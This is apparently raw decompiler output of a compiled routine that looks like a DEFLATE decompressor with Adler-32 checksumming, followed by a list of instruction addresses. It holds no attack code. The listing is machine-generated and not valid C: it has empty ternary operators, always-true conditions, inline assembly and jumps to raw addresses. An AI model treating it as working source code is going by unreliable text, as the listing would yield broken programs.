				signed int _t622;
				signed int _t631;
				void* _t633;
				void* _t662;
				short _t670;
				void* _t675;
				signed int _t703;
				signed int _t704;
				void* _t708;
				void* _t711;
				void* _t713;
				signed int _t721;
				signed long long _t728;
				signed long long _t729;
				signed long long _t735;
				signed long long _t736;
				long long _t752;
				signed int _t761;
				signed long long _t762;
				signed long long _t763;
				signed long long _t767;
				signed long long _t768;
				signed long long _t769;
				signed long long _t770;
				signed long long _t771;
				signed long long _t772;
				signed long long _t773;
				signed long long _t775;
				void* _t776;
				long long* _t783;
				void* _t785;
				long long _t786;
				signed long long _t788;
				signed long long _t792;
				signed long long _t793;
				intOrPtr _t806;
				void* _t808;
				long long _t811;
				signed long long _t812;
				intOrPtr _t813;
				signed long long _t815;
				signed long long _t822;
				unsigned long long _t825;
				unsigned long long _t826;
				intOrPtr _t835;
				signed long long _t840;
				unsigned long long _t842;
				signed long long _t849;
				signed long long _t850;
				signed long long _t854;
				signed long long _t858;
				intOrPtr _t859;
				void* _t861;
				signed long long _t870;
				void* _t875;
				signed long long _t878;
				signed char* _t883;
				signed long long _t887;
				void* _t892;
				signed long long _t903;
				void* _t905;
				void* _t911;
				intOrPtr _t914;
				void* _t916;
				intOrPtr _t923;
				intOrPtr _t926;
				signed char* _t931;
				intOrPtr _t933;
				intOrPtr _t934;
				intOrPtr _t935;
				intOrPtr _t937;
				signed long long _t938;
				long long _t943;
				signed char* _t946;
				long long _t954;
				signed char* _t957;
				void* _t963;
				void* _t964;
				void* _t968;
				void* _t969;
				signed int* _t970;
				signed long long _t976;

				 *((long long*)(_t905 + 0x70)) = __r13;
				r13d =  *(_t905 + 0x3c);
				_t887 =  *((intOrPtr*)(_t905 + 0x1a8));
				if (__r8 == _t887) goto 0xf3060b97;
				_t785 = _t887 - __r8;
				_t786 =  >=  ? __rax : _t785;
				 *((long long*)(_t905 + 0x28)) =  *(_t905 + 0xb8);
				 *((long long*)(_t905 + 0x20)) = _t786;
				E000007FE7FEF30616A0();
				_t933 =  *((intOrPtr*)(_t905 + 0x58));
				_t911 = __r8 + _t786;
				r12b = 0xc;
				 *(_t905 + 0x40) =  *(_t905 + 0x40) - __ebx;
				if (_t785 != __rax) goto 0xf3060208;
				_t954 =  *((intOrPtr*)(_t905 + 0x70));
				r12b = 3;
				if ( *((intOrPtr*)(_t933 + 0x18)) == 0) goto 0xf305f43b;
				_t472 =  *(_t905 + 0x38);
				_t859 =  *((intOrPtr*)(_t905 + 0xe0));
				_t593 =  >=  ? r14d : _t472 >> 3;
				_t456 = _t887 * 8;
				_t352 = (_t472 & 0xfffffff8) - _t456;
				 *(_t905 + 0x38) = _t352;
				_t963 = __r14 - __r15 + _t859 - _t887;
				if (_t963 - _t859 > 0) goto 0xf30613c7;
				_t964 = _t963 + _t954;
				 *(_t905 + 0x30) =  !(0xffffffff << (_t352 & 0x00000038)) &  *(_t905 + 0x30) >> (_t472 & 0x00000007);
				r12b = 0x18;
				if (( *(_t905 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t905 + 0x40) = 0;
				r12b = 0x17;
				_t476 =  *(_t905 + 0x40) & 0x000001ff;
				 *(_t905 + 0x40) = _t476;
				r12b = 0x14;
				if (_t476 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t476 - 0x11d > 0) goto 0xf305f43b;
				_t477 =  *(__rax + 0xf311eee8) & 0x000000ff;
				_t631 = _t477;
				r12b = _t631 == 0;
				 *(_t905 + 0x44) = _t477;
				 *(_t905 + 0x40) =  *(0xf311ef08 + __rax * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t905 + 0x3c);
				if (_t631 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t905 + 0xf4)) != 0) goto 0xf305f43b;
				_t875 = _t911 + 0xf311ef08;
				_t822 =  *((intOrPtr*)(_t905 + 0x1a8));
				_t633 = _t875 - _t822;
				if (_t633 > 0) goto 0xf30603b1;
				_t728 = (_t911 - __r8 &  *(_t905 + 0xb8)) - _t911;
				if (_t633 < 0) goto 0xf3060a9a;
				if (_t728 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t360 =  *(_t905 + 0x40);
				_t561 =  *(_t905 + 0x50);
				if (_t360 - 3 > 0) goto 0xf3060605;
				_t479 =  *(_t905 + 0x38);
				if (_t479 == 0) goto 0xf3060421;
				_t892 = _t964;
				if (_t479 - 8 >= 0) goto 0xf3060436;
				if (_t892 == __r15) goto 0xf3060413;
				_t788 =  *(_t905 + 0x30) | _t822 << _t479;
				 *(_t905 + 0x30) = _t788;
				 *(_t905 + 0x38) = _t479 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t561;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t892 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t825 = _t788 >> 8;
				 *(_t905 + 0x30) = _t825;
				 *(_t905 + 0x38) = ( *(_t933 + 0x14) << 8) + 0xfffffff8;
				_t539 =  *(_t933 + 0x14) << 8;
				_t485 = _t456 & 0x000000ff | _t539;
				 *(_t933 + 0x14) = _t485;
				 *(_t905 + 0x40) = _t360 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t561;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t363 = _t485 & 0x000000ff;
				if (_t363 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t595 =  !_t593 & _t539;
				_t826 = _t825 >> _t363;
				 *(_t905 + 0x30) = _t826;
				 *(_t905 + 0x38) = _t456;
				 *(_t905 + 0x40) =  *(_t905 + 0x40) + _t595;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t905 + 0x30) = _t826 >> _t363;
				 *(_t905 + 0x38) = _t456;
				 *(_t905 + 0x3c) =  *(_t905 + 0x3c) + ( !_t595 & _t539);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t905 + 0x30) = _t788 >> _t363;
				 *(_t905 + 0x38) = _t561;
				 *(_t905 + 0x80) = _t728;
				 *(_t905 + 0x88) = _t728;
				 *((long long*)(_t905 + 0x90)) = 0xb;
				_t489 =  *(_t905 + 0x3c);
				_t729 = _t728 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t489 != 0x10) goto 0xf30606d9;
				if (_t875 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t905 + 0x30) = _t729 >> 8;
				 *(_t905 + 0x38) = _t489 + 0xfffffff8;
				 *(_t905 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t366 =  *(_t933 + 0x291d) & 0x0000ffff;
				 *(_t905 + 0x40) = _t366;
				r12b = 0x1e;
				if (_t366 !=  !( *(_t933 + 0x291f) & 0x0000ffff)) goto 0xf305f43b;
				r12b = 0x14;
				if (_t366 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t806 =  *((intOrPtr*)(_t905 + 0x128));
				E000007FE7FEF30F24C0();
				_t934 =  *((intOrPtr*)(_t905 + 0x58));
				 *(_t905 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t729 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t905 + 0x6c);
				if (_t806 - 1 > 0) goto 0xf3060acc;
				_t493 =  *(_t905 + 0x38);
				_t371 =  *((short*)(_t934 + 0x3c + _t729 * 2));
				if (_t371 < 0) goto 0xf3060659;
				if ((_t371 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t372 = _t371 >> 9;
				if (_t493 - _t372 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t493 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t372 - 0x23f > 0) goto 0xf3061218;
				_t374 =  *((short*)(_t934 + 0x83c + _t729 * 2));
				if (_t374 >= 0) goto 0xf3060690;
				if (_t493 - 0xc >= 0) goto 0xf3060663;
				if (_t374 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t968 = __r15 + 1;
				 *(_t905 + 0x30) =  *(_t905 + 0x30) | _t729 << _t493;
				 *(_t905 + 0x38) = _t806 + 8;
				_t662 = _t493 - 6;
				if (_t662 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t861 =  *((intOrPtr*)(_t905 + 0x80 + _t729 * 8)) + (_t788 & 0xffffffff);
				if (_t662 < 0) goto 0xf30613e0;
				if (_t861 + _t875 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t861 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t905 + 0x40) =  *(_t905 + 0x40) + _t561;
				r12b = 0xa;
				_t935 =  *((intOrPtr*)(_t905 + 0x58));
				_t943 =  *((intOrPtr*)(_t905 + 0x1a0));
				_t914 =  *((intOrPtr*)(_t905 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t577 =  *(_t905 + 0x38);
				 *(_t905 + 0x68) =  *(_t905 + 0x3c);
				r9d =  *(_t905 + 0x44);
				_t735 = __r15 - _t968;
				r12b = 0xc;
				if (_t735 - 0xe < 0) goto 0xf3060b66;
				if (_t577 - 0x1d > 0) goto 0xf3060794;
				_t736 = _t735 << _t577;
				_t969 = _t968 + 4;
				_t496 =  *((short*)(_t935 + 0x3c + _t736 * 2));
				if (_t496 < 0) goto 0xf30607bc;
				if ((_t496 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t496 - 0x23f > 0) goto 0xf306126f;
				_t670 =  *((short*)(_t935 + 0x83c +  &(( *(_t905 + 0xe8))[_t875]) * 2));
				if (_t670 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t670 < 0) goto 0xf30608a8;
				_t388 =  *((short*)(_t935 + 0x3c + _t736 * 2));
				if (_t388 < 0) goto 0xf3060820;
				if ((_t388 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t388 - 0x23f > 0) goto 0xf306127b;
				_t390 =  *((short*)(_t935 + 0x83c + _t736 * 2));
				if (_t390 < 0) goto 0xf3060825;
				_t391 = _t390 & 0x0000ffff;
				_t675 = _t914 -  *((intOrPtr*)(_t905 + 0x1a8));
				if (_t675 >= 0) goto 0xf3061284;
				_t580 = _t577 + 0x20;
				 *((intOrPtr*)(_t943 + _t914)) = bpl;
				_t808 = _t914 + 1;
				asm("bt eax, 0x8");
				if (_t675 < 0) goto 0xf30608a3;
				_t835 =  *((intOrPtr*)(_t905 + 0x1a8));
				if (_t808 - _t835 >= 0) goto 0xf30612a2;
				 *(_t943 + _t914 + 1) = _t391;
				if (_t835 - _t914 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t916 = _t808;
				_t393 = _t391 & 0x000001ff;
				if (_t393 == 0x100) goto 0xf3060b5e;
				if (_t393 - 0x11d > 0) goto 0xf3061298;
				if (_t580 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t969 - 3 <= 0) goto 0xf306140a;
				_t970 = _t969 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t401 =  *((short*)(_t935 + 0xdda));
				if (_t401 < 0) goto 0xf3060955;
				if ((_t401 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t401 - 0x23f > 0) goto 0xf306127b;
				_t403 =  *((short*)(_t935 + 0x15da));
				if (_t403 < 0) goto 0xf306095a;
				_t583 = _t580 + 0x20 - r9d - 0xb;
				if ((_t403 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t905 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t905 + 0x118)) = __r8;
				if (r9d == 0) goto 0xf3060a01;
				if (_t583 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t970 - 3 <= 0) goto 0xf306140a;
				_t870 = ((( *(_t905 + 0x30) | _t736) >> 0x0000000a >> 0xb | __r15 - _t969 << _t580) >> r9d >> 0xb | 0xffffffff << r9d << _t583) >> r9d;
				_t585 = _t583 + 0x20 - r9d;
				 *(_t905 + 0x68) = ( !( *_t970) & _t561) +  *(_t905 + 0x68);
				r9d =  *(_t905 + 0x68);
				if (_t916 - __r8 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t905 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t905 + 0x70)) = _t954;
				 *((long long*)(_t905 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t905 + 0x28)) =  *(_t905 + 0xb8);
				 *((long long*)(_t905 + 0x20)) = 0xf311ef68;
				_t811 = _t943;
				_t840 =  *((intOrPtr*)(_t905 + 0x1a8));
				E000007FE7FEF306148C(_t811, _t840, _t916, __r8);
				if ( *((intOrPtr*)(_t905 + 0x1a8)) - _t916 +  *((intOrPtr*)(_t905 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t905 + 0x40) = _t585;
				goto 0xf305f43b;
				_t752 =  *(_t905 + 0xb8);
				 *((long long*)(_t905 + 0x28)) = _t752;
				 *((long long*)(_t905 + 0x20)) = _t811;
				_t812 =  *((intOrPtr*)(_t905 + 0x1a0));
				_t412 = E000007FE7FEF306148C(_t812, _t840, _t811,  *((intOrPtr*)(_t905 + 0x118)));
				_t937 =  *((intOrPtr*)(_t905 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t515 = _t412;
				_t842 = _t840 << _t515 |  *(_t905 + 0x30);
				 *(_t905 + 0x30) = _t842;
				 *(_t905 + 0x38) = _t412 + 0x10;
				goto 0xf3060aee;
				_t562 =  *((short*)(_t937 + 0x3c + _t812 * 2));
				if (_t562 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t562 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t565 =  *((short*)(_t937 + 0x83c + _t870 * 2));
				if (_t565 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t905 + 0x30) = _t842 >> 0xb;
				 *(_t905 + 0x38) = _t515 - 0xb;
				 *(_t905 + 0x40) = _t565 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t905 + 0x30) = _t870;
				 *(_t905 + 0x38) = _t585;
				 *(_t905 + 0x3c) =  *(_t905 + 0x68);
				 *(_t905 + 0x40) = 0x100;
				 *(_t905 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t812 + 8)) = 0xfd;
				 *_t812 = _t752;
				 *((long long*)(_t812 + 0x10)) = _t752;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t938 =  *((intOrPtr*)(_t905 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t418 = r9b & 0xffffffff;
				if (_t418 == 0xfc) goto 0xf3060cbe;
				_t522 =  *(_t905 + 0x38);
				_t569 =  >=  ? _t418 - r15d + r14d : _t522 >> 3;
				_t421 = _t870 * 8;
				 *(_t905 + 0x38) = _t522 - _t421;
				_t878 =  &(_t970[1]);
				_t903 =  *((intOrPtr*)(_t905 + 0x1b0));
				goto 0xf3060cc0;
				_t813 =  *((intOrPtr*)(_t905 + 0x1a8));
				if ( *((intOrPtr*)(_t905 + 0x70)) != _t813) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t421 & 0xffffff00 | r12b == 0x00000017);
				_t923 = _t813;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t938 + 0x291c) = r12b;
				_t524 =  *(_t905 + 0x38);
				 *(_t938 + 8) = _t524;
				 *(_t938 + 0x24) =  *(_t905 + 0x3c);
				 *(_t938 + 0x28) =  *(_t905 + 0x40);
				 *(_t938 + 0x2c) =  *(_t905 + 0x44);
				 *_t938 =  !(0xffffffff << _t524) &  *(_t905 + 0x30);
				_t703 =  *(_t905 + 0x1b8) & 0x00000040;
				if (_t703 != 0) goto 0xf3061169;
				if (_t703 == 0) goto 0xf3061169;
				_t704 = r9b;
				if (_t704 < 0) goto 0xf3061169;
				_t792 = _t923 - _t903;
				if (_t704 < 0) goto 0xf306137a;
				 *(_t905 + 0xb8) = _t870;
				 *(_t905 + 0x6c) = r9d;
				if (_t923 -  *((intOrPtr*)(_t905 + 0x1a8)) > 0) goto 0xf3061389;
				_t425 =  *(_t938 + 0x20);
				_t946 =  *((intOrPtr*)(_t905 + 0x1a0)) + _t903;
				_t572 = _t425 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t815 = _t792 & 0xfffffffc;
				 *(_t905 + 0xf8) = _t792;
				 *(_t905 + 0x108) = _t792;
				_t761 = _t815 - 0x3f51f0dfc0;
				 *(_t905 + 0x50) = _t761;
				r12d = 0x56c0;
				 *(_t905 + 0xe8) = _t946;
				 *(_t905 + 0xd8) = _t878;
				 *(_t905 + 0x7c) = _t572;
				 *(_t905 + 0x100) = _t815;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t572 * 0x56c0;
				_t957 = _t946;
				 *(_t905 + 0x80) =  *_t957 & 0x000000ff;
				 *(_t905 + 0x84) = _t957[1] & 0x000000ff;
				 *(_t905 + 0x88) = _t957[2] & 0x000000ff;
				 *(_t905 + 0x8c) = _t957[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t905 + 0xc0 + _t938 * 4)) =  *((intOrPtr*)(_t905 + 0xc0 + _t938 * 4)) +  *((intOrPtr*)(_t905 + 0x80 + _t938 * 4));
				_t239 = _t938 + 1; // 0x1
				if (_t239 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t905 + 0xa0 + _t878 * 4)) =  *((intOrPtr*)(_t905 + 0xa0 + _t878 * 4)) +  *((intOrPtr*)(_t905 + 0x80 + _t878 * 4));
				_t249 = _t878 + 1; // 0x1
				_t708 = _t249 - 4;
				if (_t708 != 0) goto 0xf3060e4c;
				_t762 = _t761 + 0xfffffffc;
				if (_t708 != 0) goto 0xf3060dea;
				_t465 =  *(_t905 + 0xc0 + _t762 * 4);
				 *(_t905 + 0xc0 + _t762 * 4) = _t465;
				_t256 = _t762 + 1; // 0x1
				_t793 = _t256;
				_t763 = _t793;
				if (_t793 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t905 + 0xa0 + _t763 * 4)) =  *((intOrPtr*)(_t905 + 0xa0 + _t763 * 4)) - _t465 * 0xfff1;
				_t263 = _t763 + 1; // 0x1
				if (_t263 != 4) goto 0xf3060ea7;
				_t767 = _t903 * _t815 >> 0x2f;
				_t711 = 0x3f51f08900 - __r12;
				if (_t711 >= 0) goto 0xf3060de2;
				_t976 =  *(_t905 + 0x108);
				r14d = r14d & 0x00000003;
				_t926 =  *((intOrPtr*)(_t905 + 0x58));
				r10d =  *(_t905 + 0x1b8);
				_t883 =  *(_t905 + 0xe8);
				r12d =  *(_t905 + 0x7c);
				if (_t711 == 0) goto 0xf3060fc8;
				_t931 = 0x3f51f0dfc0 + _t883;
				 *(_t905 + 0x80) =  *_t931 & 0x000000ff;
				 *(_t905 + 0x84) = _t931[1] & 0x000000ff;
				 *(_t905 + 0x88) = _t931[2] & 0x000000ff;
				 *(_t905 + 0x8c) = _t931[3] & 0x000000ff;
				 *((intOrPtr*)(_t905 + 0xc0 + _t767 * 4)) =  *((intOrPtr*)(_t905 + 0xc0 + _t767 * 4)) +  *((intOrPtr*)(_t905 + 0x80 + _t767 * 4));
				_t287 = _t767 + 1; // 0x1
				_t849 = _t287;
				_t768 = _t849;
				if (_t849 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t552 =  *(_t905 + 0x80 + _t768 * 4);
				 *((intOrPtr*)(_t905 + 0xa0 + _t768 * 4)) =  *((intOrPtr*)(_t905 + 0xa0 + _t768 * 4)) + _t552;
				_t297 = _t768 + 1; // 0x1
				_t850 = _t297;
				_t769 = _t850;
				_t713 = _t850 - 4;
				if (_t713 != 0) goto 0xf3060f9f;
				if (_t713 != 0) goto 0xf3060f41;
				_t553 = _t552 * 0xfff1;
				 *((intOrPtr*)(_t905 + 0xc0 + _t769 * 4)) =  *((intOrPtr*)(_t905 + 0xc0 + _t769 * 4)) - _t553;
				_t305 = _t769 + 1; // 0x1
				_t854 = _t305;
				_t770 = _t854;
				if (_t854 != 4) goto 0xf3060fd7;
				r9d =  *(_t905 + 0x6c);
				 *((intOrPtr*)(_t905 + 0xa0 + _t770 * 4)) =  *((intOrPtr*)(_t905 + 0xa0 + _t770 * 4)) - _t553 * 0xfff1;
				_t314 = _t770 + 1; // 0x1
				_t858 = _t314;
				_t771 = _t858;
				if (_t858 != 4) goto 0xf3061019;
				 *(_t905 + 0xa0 + _t771 * 4) =  *(_t905 + 0xa0 + _t771 * 4) << 2;
				_t772 = _t771 + 1;
				if (_t772 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t905 + 0xa4)) =  *((intOrPtr*)(_t905 + 0xa4)) -  *((intOrPtr*)(_t905 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t905 + 0xa8)) =  ~( *((intOrPtr*)(_t905 + 0xc8)) +  *((intOrPtr*)(_t905 + 0xc8))) +  *((intOrPtr*)(_t905 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t905 + 0xac)) =  *((intOrPtr*)(_t905 + 0xac)) + _t858 + _t858 * 2;
				_t773 = _t772 + 1;
				if (_t773 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t905 + 0x50);
				_t775 = _t773 * _t903 >> 0x2f;
				_t776 = _t775 + 1;
				if (_t776 != 4) goto 0xf30610e4;
				if (_t976 == 0) goto 0xf306110b;
				_t534 = r12d +  *((intOrPtr*)(_t905 + 0xc0 + _t772 * 4)) + ( *(_t883 +  *(_t905 + 0x100) + _t776) & 0x000000ff);
				_t619 = (_t425 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t905 + 0xa0 + _t775 * 4)) + _t534;
				if (_t976 != _t776 + 1) goto 0xf30610fb;
				_t454 = _t619 * 0xfff1;
				_t622 = _t619 - _t454 << 0x00000010 | _t534 - _t534 * 0x0000fff1;
				 *(_t926 + 0x20) = _t622;
				_t721 = r9b;
				if (_t721 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t721 == 0) goto 0xf306117f;
				r9b = _t622 ==  *((intOrPtr*)(_t926 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t783 =  *((intOrPtr*)(_t905 + 0x110));
				 *(_t783 + 8) = r9b;
				 *_t783 =  *((intOrPtr*)(_t905 + 0xe0)) -  *(_t905 + 0xb8) + __r15 +  *(_t905 + 0xd8);
				 *((long long*)(_t783 + 0x10)) = _t926 - _t903;
				return _t454;
			}

0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
